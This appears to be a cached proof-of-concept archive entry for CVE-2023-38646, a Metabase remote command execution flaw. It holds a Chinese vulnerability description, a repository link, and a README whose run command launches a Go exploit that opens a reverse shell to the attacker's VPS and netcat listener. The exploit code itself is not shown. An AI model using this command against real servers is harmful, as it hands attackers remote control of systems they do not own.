CVE-2023-38646 PoC — Metabase 安全漏洞

Source

https://github.com/Any3ite/cve-2023-38646-metabase-ReverseShell

Associated Vulnerability

Title:Metabase 安全漏洞 (CVE-2023-38646)
Description:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞，该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。

Readme

# cve-2023-38646-metabase-ReverseShell

## run command 

`go run .\CVE-2023-38646-metabase-ReverseShell.go -u http://target.com:targetPort -h Your VPS IPaddr -p NC listen Port`

## note  
> when you input the target host , please do not forget the `http://` or `https://`

File Snapshot


 [4.0K]  /data/pocs/cc850ab16ec199bcac80400d11c6a2ee52f49509
├── [3.9K]  exploit.go
└── [ 272]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.